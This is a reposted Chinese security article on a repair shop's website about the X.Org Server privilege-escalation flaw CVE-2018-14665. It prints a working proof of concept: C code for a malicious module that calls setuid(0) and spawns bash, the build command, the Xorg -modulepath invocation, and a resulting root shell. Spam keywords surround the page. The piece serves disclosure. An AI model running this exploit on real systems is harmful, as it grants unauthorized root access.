在线精品亚洲一区二区,992tv人人草,精品久久97

錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)

		設(shè)為首頁
		收藏本站

首頁

公司介紹

服務(wù)項目

服務(wù)報價

維修流程

IT外包服務(wù)

服務(wù)器維護

技術(shù)文章

常見故障

錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù) → 技術(shù)文章

X.Org Server軟件包存在提權(quán)漏洞，影響主流Linux發(fā)行版

作者: 佚名日期:2018-11-02 19:41:18 來源: 本站整理

印度安全研究員Narendra Shinde在X.Org Server軟件包中發(fā)現(xiàn)了一個非常關(guān)鍵的提權(quán)漏洞（CVE-2018-14665），主流Linux發(fā)行版均受到影響，包括OpenBSD、Debian、Ubuntu、CentOS、Red Hat和Fedora。

X.Org Server軟件包提供了X窗口系統(tǒng)（X Window System，也常稱為X11或X）的開源實現(xiàn)。

X Window System是一種以位圖方式顯示的軟件窗口系統(tǒng)。最初是1984年麻省理工學(xué)院的研究，之后變成UNIX、類UNIX、以及OpenVMS等操作系統(tǒng)所一致適用的標準化軟件工具包及顯示架構(gòu)的運作協(xié)議。X窗口系統(tǒng)通過軟件工具及架構(gòu)協(xié)議來創(chuàng)建操作系統(tǒng)所用的圖形用戶界面，此后則逐漸擴展適用到各形各色的其他操作系統(tǒng)上。現(xiàn)在幾乎所有的操作系統(tǒng)都能支持與使用X。更重要的是，今日知名的桌面環(huán)境——GNOME和KDE也都是以X窗口系統(tǒng)為基礎(chǔ)建構(gòu)成的。
根據(jù)Narendra Shinde的說法，X.Org服務(wù)器自版本1.19.0起就存在該漏洞，距今已經(jīng)兩年多了，只要X.Org服務(wù)器以提升的權(quán)限運行，該漏洞就可被利用。

提權(quán)和任意文件覆蓋

Shinde發(fā)現(xiàn)漏洞根源在于X.Org服務(wù)器無法正確處理和驗證至少以下兩個命令行的參數(shù)：

* -modulepath：設(shè)置和搜索Xorg服務(wù)器模塊的目錄路徑；

* -logfile：跳過位于/var/log/Xorg.n.log的默認日志，為Xorg服務(wù)器設(shè)置新的日志文件。
當(dāng)X.Org服務(wù)器提權(quán)運行時，比如使用setuid命令安裝并由非root用戶啟動時：

* -modulepath：可用于指定加載不安全模塊的路徑, 允許在高級進程中跨權(quán)限執(zhí)行代碼。

* -logfile：可用于在文件系統(tǒng)中實現(xiàn)任意文件覆蓋。
實例

1、收集X.Org服務(wù)器加載的模塊信息

X.Org服務(wù)器在啟動期間加載各種模塊，本演示中使用 – libglx.so：

[ 5549.223] (II) LoadModule: "glx"
[ 5549.223] (II) Loading /usr/lib/xorg/modules/extensions/libglx.so
[ 5549.224] (II) Module glx: vendor="X.Org Foundation
2、創(chuàng)建shell模塊

Shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
setgid(0);
setuid(0);
system("/bin/bash");
}

[developer@centos-x86 xorg-demo]$ gcc -fPIC -shared -o libglx.so shell.c -nostartfiles
[developer@centos-x86 xorg-demo]$
[developer@centos-x86 xorg-demo]$ ls -la
total 16
drwxrwxr-x. 2 developer developer 38 Oct 26 22:14 .
drwx------. 26 developer developer 4096 Oct 26 22:02 ..
-rwxrwxr-x. 1 developer developer 5772 Oct 26 22:14 libglx.so
-rw-rw-r--. 1 developer developer 147 Oct 26 22:03 shell.c
[developer@centos-x86 xorg-demo]$
[developer@centos-x86 xorg-demo]$
3、加載惡意shell模塊

[developer@centos-x86 ~]$
[developer@centos-x86 ~]$ id
uid=1000(developer) gid=1000(developer) groups=1000(developer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[developer@centos-x86 ~]$
[developer@centos-x86 ~]$ Xorg -modulepath ',/home/developer/xorg-demo' :2

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux centos-x86.localdomain 3.10.0-862.14.4.el7.centos.plus.i686 #1 SMP Fri Sep 28 05:30:57 UTC 2018 i686
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.centos.plus.i686 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8
Build Date: 11 April 2018 04:44:33PM
Build ID: xorg-x11-server 1.19.5-5.el7
Current version of pixman: 0.34.0
   Before reporting problems, check http://wiki.x.org
   to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
   (++) from command line, (!!) notice, (II) informational,
   (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(==) Log file: "/var/log/Xorg.2.log", Time: Fri Oct 26 22:15:12 2018
(==) Using config directory: "/etc/X11/xorg.conf.d"
(==) Using system config directory "/usr/share/X11/xorg.conf.d"
'abrt-cli status' timed out

-- wait for few seconds and you will be dropped into root shell ---

[root@centos-x86 ~]#
[root@centos-x86 ~]#
[root@centos-x86 ~]# id
uid=0(root) gid=0(root) groups=0(root),1000(developer) context=unconfined_u:unconfined_r:xserver_t:s0-s0:c0.c1023
[root@centos-x86 ~]#
4、模塊加載器日志：[ 6683.669] (++) ModulePath set to ",/home/developer/xorg-demo"

[ 6683.669] (II) The server relies on udev to provide the list of input devices.
          If no devices become available, reconfigure udev or disable AutoAddDevices.
[ 6683.669] (II) Loader magic: 0x6f5020
[ 6683.669] (II) Module ABI versions:
[ 6683.669]    X.Org ANSI C Emulation: 0.4
[ 6683.669]    X.Org Video Driver: 23.0
[ 6683.669]    X.Org XInput driver : 24.1
[ 6683.669]    X.Org Server Extension : 10.0
[ 6683.678] (--) PCI:*(0:0:2:0) 80ee:beef:0000:0000 rev 0, Mem @ 0xe0000000/33554432, BIOS @ 0x????????/131072
[ 6683.678] (II) LoadModule: "glx"
[ 6683.678] (II) Loading /home/developer/xorg-demo/libglx.so

熱門文章

機械革命S1 PRO－02 開機不顯示黑...

聯(lián)想ThinkPad NM-C641上電掉電點不...

三星一體激光打印機SCX－4521F維修...

通過串口命令查看EMMC擦寫次數(shù)和判...

IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...

索尼kd-49x7500e背光一半暗且閃爍 ...

樓宇對講門禁讀卡異常維修，讀卡芯...

新款海信電視機始終停留在開機界面...

常見打印機清零步驟

安裝驅(qū)動時提示不包含數(shù)字簽名的解...

共享打印機需要密碼的解決方法

圖解Windows 7系統(tǒng)快速共享打印機的...

報修電話：13840665804 QQ：174984393 (聯(lián)系人:毛先生)
E-Mail：174984393@qq.com
維修中心地址：錦州廣廈電腦城
ICP備案/許可證號：遼ICP備2023002984號-1
上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
主要業(yè)務(wù)：修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

技術(shù)支持:微軟等

国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片